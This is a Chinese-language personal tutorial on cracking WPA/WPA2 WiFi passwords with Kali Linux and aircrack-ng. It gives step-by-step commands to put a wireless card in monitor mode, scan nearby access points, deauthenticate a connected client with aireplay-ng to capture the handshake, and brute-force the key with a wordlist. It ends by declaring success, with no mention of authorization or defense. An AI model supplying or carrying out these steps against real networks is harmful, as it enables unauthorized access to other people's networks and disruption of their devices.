wifi破解

wifi破解学习

工具列举

kali操作系统、无线网卡、电脑。。。。，还需要有一个wifi破解的字典（这个靠自己）

知识须知

AP(Access Point): 网络接入点，是一种连接无线或有线网络的设备。就是我们俗称的路由器。

MAC(Media Access Control Address): 相当于网卡的身份证，MAC 地址本身是不能修改，但是可以通过伪造MAC 地址欺骗AP。

WEP(Wireless Encryption Protocol): 无线加密协议。很早的一种加密协议，容易破解。

WPA/WPA2(Wi-FiProtected Access): 基于WEP更安全的加密系统。

Handshake:握手。我的理解相当于三次握手。

IV(Initialization Vector)s:初始化向量。

流程

在全部步骤之前，要把权限提到root，如果不这样，就要每次都sudo

我忘了root密码，就sudo了

先要确定网卡信息

$  iwconfig

如果是这样的界面，就表示成功了，如果没有wlan0这个信息

那么可以

按着这个步骤 可移动设备->WLAN->连接主机

再试试刚才的命令，应该就可以了

你看看wlan0中Mode后面是managed还是monitor，如果不是monitor，就要激活网卡监视模式

ifconfig wlan0mon down 
iwconfig wlan0mon mode monitor 
ifconfig wlan0mon up 

然后你就能看到mode后面变成monitor

强制关闭冲突程序

$ airmon-ng check kill

获取附近AP信息

airodump-ng wlan0mon

这里解释几个参数：
BSSID(Basic Service SetIdentifier): AP 的MAC 地址。
ESSID(The Extended Service Set Identifier): AP 的名称。
PWR(Power): 信号强度。
Beacons: AP发出的通告编号，每个接入点（AP）在最低速率（1M）时差不多每秒会发送10个左右的beacon，所以它们能在很远的地方就被发现。

Data:当前数据传输量。

#/s:过去10秒钟内每秒捕获数据分组的数量。
CH(Channel): AP 所在的频道。
MB: AP 的最大传输速度。MB=11 => 802.11b，MB=22 => 802.11b+， MB>22 => 802.11g。后面带.的表示短封包标头，处理速度快，更利于破解。
ENC(Encryption): 使用的加密算法体系。
CIPHER: 检测到的加密算法。
AUTH(Authority): 认证方式。

开始抓包

$ airodump-ng  --bssid BSSID -c CH -w 文件位置 wlan0
bssid 后面跟着目标目标bssid
-c 后面跟着目标频道,必须要加,不加的话,airdump-ng会每个频道都试

表示连接上此AP设备信息

一定确保有设备连接到该网络,要不然没有办法抓到包

再另开一个终端

作为发送请求的客户端,输入一下命令

aireplay-ng -0 10 -a BSSID -c STATION wlan0mon  # -0 表示DeAuth模式，10表示攻击次数，-c是第3 步中的得到的STATION，即已连接上的客户端MAC 地址

右上角出现那个WPA handshake:....就证明成功抓到包了,就可以ctrl +c停止了

最后

aircrack-ng -w Wordlists.txt CAP-01.cap #-w表示字典包的路径， CAP 表示第 1 步中保存的文件中 -01.cap 文件，因为我们对每个 AP 的尝试可能不止一次，所以 airodump-ng 会自动在文件名后加类似01，02这样的数字表示次数，所以记得最后破解的时候输入正确的 CAP 包名称。

等待key found

成功破解